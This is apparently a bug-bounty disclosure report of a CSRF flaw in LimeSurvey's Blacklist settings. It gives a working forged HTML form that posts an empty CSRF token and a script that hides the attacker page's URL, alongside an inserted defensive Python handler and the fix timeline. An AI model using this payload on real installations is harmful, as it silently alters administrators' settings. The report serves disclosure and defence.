CSRF edit Blacklist settings (YES to NO) in limesurvey/limesurvey


Reported on

Sep 30th 2023


CSRF edit Blacklist settings

Proof of Concept

1. For example, all of the fields in the Blacklist settings are set to YES.

2. The attacker sends the logged-in user a forged form that posts to the blacklist-settings endpoint with an empty CSRF token:

    <form action="https://haido456.limesurvey.net/admin/participants/sa/storeBlacklistValues" method="POST">
      <!-- Empty token: the endpoint accepts the request anyway -->
      <input type="hidden" name="YII_CSRF_TOKEN" value="" />
      <input type="hidden" name="blacklistallsurveys" value="0" />
      <input type="hidden" name="blacklistnewsurveys" value="0" />
      <input type="hidden" name="blockaddingtosurveys" value="0" />
      <input type="hidden" name="hideblacklisted" value="0" />
      <input type="hidden" name="deleteblacklisted" value="0" />
      <input type="hidden" name="allowunblacklist" value="0" />
      <input type="hidden" name="yt0" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Hide the attacker page's real URL from the address bar
      history.pushState('', '', '/');
    </script>

3. The user clicks the button and every setting changes to NO, which the user did not want.
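The defensive counterpart to the steps above, as an added example that is not LimeSurvey's code: a hypothetical handler for the storeBlacklistValues action that binds the CSRF token to the session, rejects a missing or empty token before comparing, and compares in constant time, so the forged request above leaves the settings untouched. The Session class, field names other than those in the form, and the return values are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Field names taken from the report's form; the session store is a constructed stand-in.
TOKEN_FIELD = "YII_CSRF_TOKEN"
BLACKLIST_FIELDS = ("blacklistallsurveys", "blacklistnewsurveys", "blockaddingtosurveys",
                    "hideblacklisted", "deleteblacklisted", "allowunblacklist")


@dataclass
class Session:
    # A fresh random token per session, never derivable by a third-party page.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))
    # All settings start at YES ("1"), as in step 1 of the report.
    blacklist: dict = field(default_factory=lambda: {f: "1" for f in BLACKLIST_FIELDS})


def csrf_token_is_valid(session: Session, submitted) -> bool:
    """Reject a missing or empty token before comparing; compare in constant time."""
    if not isinstance(submitted, str) or not submitted:
        return False
    return hmac.compare_digest(session.csrf_token, submitted)


def store_blacklist_values(session: Session, method: str, form: dict) -> tuple:
    """Hypothetical handler: returns (HTTP status, message); only a valid POST mutates state."""
    if method != "POST":
        return 405, "method not allowed"
    if not csrf_token_is_valid(session, form.get(TOKEN_FIELD)):
        return 403, "invalid CSRF token"  # settings are left exactly as they were
    for name in BLACKLIST_FIELDS:
        if name in form:
            session.blacklist[name] = "1" if form[name] == "1" else "0"
    return 200, "saved"


def forged_form() -> dict:
    """Constructed body matching the report's form: every field 0, token left empty."""
    body = {name: "0" for name in BLACKLIST_FIELDS}
    body[TOKEN_FIELD] = ""
    body["yt0"] = "Save"
    return body
```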


Impact: an attacker can trick a logged-in administrator into changing the Blacklist settings without their consent.

We are processing your report and will contact the limesurvey team within 24 hours. (5 months ago)
HaiNguyen modified the report (5 months ago)
We have contacted a member of the limesurvey team and are waiting to hear back (5 months ago)


Hi, any new update?

5 months ago


Any new update?

5 months ago

Internal tracking number: 19165

tiborpacalat validated this vulnerability 4 months ago
hainguyen0207 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
tiborpacalat marked this as fixed in 6.3.2+231031 with commit 238c39 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago